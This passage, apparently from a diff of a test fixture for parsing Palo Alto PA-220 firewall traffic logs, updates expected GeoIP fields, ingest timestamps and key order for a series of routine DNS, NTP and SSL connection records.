16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11749,26 +11399,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 315, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11890,7 +11535,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:44:05.031808600Z", + "ingested": "2021-12-14T14:51:01.287243799Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11918,26 +11563,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 130, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12059,7 +11699,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031814100Z", + "ingested": "2021-12-14T14:51:01.287244143Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -12087,26 +11727,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 288, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12228,7 +11863,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031819500Z", + "ingested": "2021-12-14T14:51:01.287244481Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -12256,26 +11891,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 149, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12397,7 +12027,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031824900Z", + "ingested": "2021-12-14T14:51:01.287244833Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -12425,26 +12055,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 202, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12566,7 +12191,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031830600Z", + "ingested": "2021-12-14T14:51:01.287245383Z", "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", @@ -12594,26 +12219,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 195, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12735,7 +12355,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031836Z", + "ingested": "2021-12-14T14:51:01.287245734Z", "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", @@ -12763,26 +12383,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 123, "bytes": 90, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12904,7 +12519,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031843200Z", + "ingested": "2021-12-14T14:51:01.287246088Z", "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", @@ -12932,26 +12547,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 192, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13073,7 +12683,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031849100Z", + "ingested": "2021-12-14T14:51:01.287246442Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13100,26 +12710,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 208, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13241,7 +12846,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031854500Z", + "ingested": "2021-12-14T14:51:01.287246859Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13268,26 +12873,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 100, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13409,7 +13009,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031859900Z", + "ingested": "2021-12-14T14:51:01.287247203Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13436,26 +13036,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 7237, - "ip": "175.16.199.1", - "packets": 11 + "packets": 11, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13577,7 +13172,7 @@ }, "event": { "duration": 10000000000, - "ingested": "2021-12-09T13:44:05.031864200Z", + "ingested": "2021-12-14T14:51:01.287247537Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13604,26 +13199,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 109, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13745,7 +13335,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031868700Z", + "ingested": "2021-12-14T14:51:01.287247880Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13773,26 +13363,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 116, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13914,7 +13499,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031874200Z", + "ingested": "2021-12-14T14:51:01.287248230Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13942,26 +13527,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 96, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14083,7 +13663,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031879700Z", + "ingested": "2021-12-14T14:51:01.287248627Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -14111,26 +13691,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14252,7 +13827,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031883500Z", + "ingested": "2021-12-14T14:51:01.287248977Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14280,26 +13855,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14421,7 +13991,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031887800Z", + "ingested": "2021-12-14T14:51:01.287249326Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14449,26 +14019,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14590,7 +14155,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031893300Z", + "ingested": "2021-12-14T14:51:01.287249673Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14618,26 +14183,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 7820, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14759,7 +14319,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031897500Z", + "ingested": "2021-12-14T14:51:01.287250013Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14787,26 +14347,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14928,7 +14483,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031901800Z", + "ingested": "2021-12-14T14:51:01.287250425Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14956,26 +14511,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 214, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15097,7 +14647,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031905300Z", + "ingested": "2021-12-14T14:51:01.287250769Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15125,26 +14675,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 214, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15266,7 +14811,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031909900Z", + "ingested": "2021-12-14T14:51:01.287251124Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15294,26 +14839,21 @@ }, 